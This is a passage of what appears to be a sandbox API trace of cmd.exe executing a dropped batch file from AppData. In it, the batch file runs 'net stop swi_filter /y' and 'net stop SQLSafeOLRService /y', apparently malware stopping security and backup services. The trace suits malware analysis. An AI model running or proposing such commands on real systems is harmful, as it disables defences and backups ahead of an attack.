hHeap=0x3e0000) returned 1 [0211.953] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0211.953] _get_osfhandle (_FileHandle=1) returned 0x264 [0211.953] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0211.953] _get_osfhandle (_FileHandle=1) returned 0x264 [0211.953] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0211.953] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0211.953] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0211.954] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0211.954] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0211.954] SetConsoleInputExeNameW () returned 0x1 [0211.954] GetConsoleOutputCP () returned 0x1b5 [0211.954] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0211.954] SetThreadUILanguage (LangId=0x0) returned 0x409 [0211.954] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0211.954] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0211.954] _get_osfhandle (_FileHandle=3) returned 0x78 [0211.954] SetFilePointer (in: hFile=0x78, lDistanceToMove=5064, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x13c8 [0211.954] GetProcessHeap () returned 0x3e0000 [0211.955] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0211.955] GetProcessHeap () returned 0x3e0000 [0211.955] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0211.955] GetProcessHeap () returned 0x3e0000 [0211.955] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0211.955] GetProcessHeap () returned 0x3e0000 [0211.955] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0211.955] GetProcessHeap () returned 0x3e0000 [0211.955] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0211.955] GetProcessHeap () returned 0x3e0000 [0211.955] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0211.955] GetProcessHeap () returned 0x3e0000 [0211.955] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0211.955] GetProcessHeap () returned 0x3e0000 [0211.955] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0211.955] GetProcessHeap () returned 0x3e0000 [0211.955] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0211.955] GetProcessHeap () returned 0x3e0000 [0211.955] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0211.955] GetProcessHeap () returned 0x3e0000 [0211.955] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0211.955] GetProcessHeap () returned 0x3e0000 [0211.955] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0211.955] GetProcessHeap () returned 0x3e0000 [0211.955] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0211.955] _get_osfhandle (_FileHandle=3) returned 0x78 [0211.955] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x13c8 [0211.955] ReadFile (in: hFile=0x78, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x4f9, lpOverlapped=0x0) returned 1 [0211.955] SetFilePointer (in: hFile=0x78, lDistanceToMove=5088, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x13e0 [0211.955] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=24, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop swi_filter /y\r\n012 /y\r\n/y\r\neΓÇ¥ /y\r\n\r\n¥ /y\r\nures\r\nnded\r\n") returned 24 [0211.956] _get_osfhandle (_FileHandle=3) returned 0x78 [0211.956] GetFileType (hFile=0x78) returned 0x1 [0211.956] _get_osfhandle (_FileHandle=3) returned 0x78 [0211.956] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x13e0 [0211.956] GetProcessHeap () returned 0x3e0000 [0211.956] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3ffad8 [0211.956] GetProcessHeap () returned 0x3e0000 [0211.956] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3ffad8 | out: hHeap=0x3e0000) returned 1 [0211.959] _tell (_FileHandle=3) returned 5088 [0211.959] _close (_FileHandle=3) returned 0 [0211.960] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0211.960] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0211.960] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0211.960] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0211.960] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0211.960] _wcsicmp (_String1="net", _String2="CD") returned 11 [0211.960] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0211.960] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0211.960] _wcsicmp (_String1="net", _String2="REN") returned -4 [0211.960] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0211.960] _wcsicmp (_String1="net", _String2="SET") returned -5 [0211.960] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0211.960] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0211.960] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0211.960] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0211.960] _wcsicmp (_String1="net", _String2="MD") returned 1 [0211.960] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0211.960] _wcsicmp (_String1="net", _String2="RD") returned -4 [0211.960] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0211.960] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0211.960] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0211.960] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0211.960] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0211.960] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0211.960] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0211.960] _wcsicmp (_String1="net", _String2="VER") returned -8 [0211.960] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0211.960] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0211.960] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0211.960] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0211.960] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0211.960] _wcsicmp (_String1="net", _String2="START") returned -5 [0211.961] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0211.961] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0211.961] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0211.961] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0211.961] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0211.961] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0211.961] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0211.961] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0211.961] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0211.961] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0211.961] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0211.961] SetErrorMode (uMode=0x0) returned 0x1 [0211.961] GetProcessHeap () returned 0x3e0000 [0211.961] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0211.961] GetProcessHeap () returned 0x3e0000 [0211.961] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0211.962] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0211.962] GetProcessHeap () returned 0x3e0000 [0211.962] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0211.962] GetProcessHeap () returned 0x3e0000 [0211.962] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0211.962] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0211.962] GetProcessHeap () returned 0x3e0000 [0211.962] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0211.962] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0211.962] GetProcessHeap () returned 0x3e0000 [0211.962] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0211.963] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0211.963] GetProcessHeap () returned 0x3e0000 [0211.963] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0211.963] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0211.964] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0211.964] GetLastError () returned 0x2 [0211.964] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0211.964] GetLastError () returned 0x2 [0211.965] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0211.965] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0211.965] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0211.965] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0211.966] GetLastError () returned 0x2 [0211.966] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0211.966] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0211.966] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0211.967] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0211.967] SetErrorMode (uMode=0x0) returned 0x1 [0211.967] GetProcessHeap () returned 0x3e0000 [0211.967] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0211.967] GetProcessHeap () returned 0x3e0000 [0211.967] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0211.968] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0211.968] GetProcessHeap () returned 0x3e0000 [0211.968] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0211.968] GetProcessHeap () returned 0x3e0000 [0211.968] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0211.968] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0211.968] GetProcessHeap () returned 0x3e0000 [0211.968] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0211.968] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0211.968] GetProcessHeap () returned 0x3e0000 [0211.968] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0211.968] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0211.969] GetProcessHeap () returned 0x3e0000 [0211.969] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0211.969] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0211.969] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0211.969] GetLastError () returned 0x2 [0211.970] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0211.970] GetLastError () returned 0x2 [0211.970] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0211.971] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f3ff0 [0211.971] FindClose (in: hFindFile=0x3f3ff0 | out: hFindFile=0x3f3ff0) returned 1 [0211.971] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0211.971] GetLastError () returned 0x2 [0211.972] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f3ff0 [0211.972] FindClose (in: hFindFile=0x3f3ff0 | out: hFindFile=0x3f3ff0) returned 1 [0211.972] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0211.972] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0211.972] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0211.973] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0211.973] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0211.973] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop swi_filter /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop swi_filter /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop swi_filter /y", lpProcessInformation=0x3beae0*(hProcess=0x74, hThread=0x78, dwProcessId=0x92c, dwThreadId=0x128)) returned 1 [0211.977] CloseHandle (hObject=0x78) returned 1 [0211.977] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0211.977] GetProcessHeap () returned 0x3e0000 [0211.977] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0211.977] GetEnvironmentStringsW () returned 0x3f8408* [0211.977] GetProcessHeap () returned 0x3e0000 [0211.978] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0211.978] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0211.978] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0212.104] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0212.104] CloseHandle (hObject=0x74) returned 1 [0212.104] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0212.104] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0212.104] GetProcessHeap () returned 0x3e0000 [0212.104] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0212.104] GetEnvironmentStringsW () returned 0x3f8408* [0212.104] GetProcessHeap () returned 0x3e0000 [0212.104] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0212.105] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0212.105] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0212.105] GetProcessHeap () returned 0x3e0000 [0212.105] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0212.105] GetEnvironmentStringsW () returned 0x3f8408* [0212.105] GetProcessHeap () returned 0x3e0000 [0212.105] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0212.106] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0212.106] GetProcessHeap () returned 0x3e0000 [0212.106] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0212.106] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0212.106] _get_osfhandle (_FileHandle=1) returned 0x264 [0212.106] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0212.106] _get_osfhandle (_FileHandle=1) returned 0x264 [0212.106] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0212.106] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0212.106] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0212.106] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0212.106] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0212.107] SetConsoleInputExeNameW () returned 0x1 [0212.107] GetConsoleOutputCP () returned 0x1b5 [0212.107] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0212.107] SetThreadUILanguage (LangId=0x0) returned 0x409 [0212.107] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0212.107] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0212.107] _get_osfhandle (_FileHandle=3) returned 0x74 [0212.107] SetFilePointer (in: hFile=0x74, lDistanceToMove=5088, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x13e0 [0212.107] GetProcessHeap () returned 0x3e0000 [0212.107] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0212.107] GetProcessHeap () returned 0x3e0000 [0212.107] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0212.107] GetProcessHeap () returned 0x3e0000 [0212.107] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0212.107] GetProcessHeap () returned 0x3e0000 [0212.107] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0212.107] GetProcessHeap () returned 0x3e0000 [0212.107] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0212.107] GetProcessHeap () returned 0x3e0000 [0212.107] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0212.107] GetProcessHeap () returned 0x3e0000 [0212.108] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0212.108] GetProcessHeap () returned 0x3e0000 [0212.108] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0212.108] GetProcessHeap () returned 0x3e0000 [0212.108] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0212.108] GetProcessHeap () returned 0x3e0000 [0212.108] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0212.108] GetProcessHeap () returned 0x3e0000 [0212.108] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3e1290 | out: hHeap=0x3e0000) returned 1 [0212.108] GetProcessHeap () returned 0x3e0000 [0212.108] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0212.108] GetProcessHeap () returned 0x3e0000 [0212.108] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0212.108] _get_osfhandle (_FileHandle=3) returned 0x74 [0212.108] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x13e0 [0212.108] ReadFile (in: hFile=0x74, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x4e1, lpOverlapped=0x0) returned 1 [0212.108] SetFilePointer (in: hFile=0x74, lDistanceToMove=5119, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x13ff [0212.108] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=31, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop SQLSafeOLRService /y\r\n\n/y\r\neΓÇ¥ /y\r\n\r\n¥ /y\r\nures\r\nnded\r\n") returned 31 [0212.109] _get_osfhandle (_FileHandle=3) returned 0x74 [0212.109] GetFileType (hFile=0x74) returned 0x1 [0212.109] _get_osfhandle (_FileHandle=3) returned 0x74 [0212.109] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x13ff [0212.109] GetProcessHeap () returned 0x3e0000 [0212.109] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3ffad8 [0212.109] GetProcessHeap () returned 0x3e0000 [0212.109] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3ffad8 | out: hHeap=0x3e0000) returned 1 [0212.112] _tell (_FileHandle=3) returned 5119 [0212.112] _close (_FileHandle=3) returned 0 [0212.112] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0212.112] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0212.112] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0212.112] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0212.112] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0212.112] _wcsicmp (_String1="net", _String2="CD") returned 11 [0212.112] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0212.112] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0212.112] _wcsicmp (_String1="net", _String2="REN") returned -4 [0212.112] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0212.112] _wcsicmp (_String1="net", _String2="SET") returned -5 [0212.113] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0212.113] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0212.113] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0212.113] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0212.113] _wcsicmp (_String1="net", _String2="MD") returned 1 [0212.113] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0212.113] _wcsicmp (_String1="net", _String2="RD") returned -4 [0212.113] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0212.113] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0212.113] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0212.113] _wcsicmp (_String1="net", 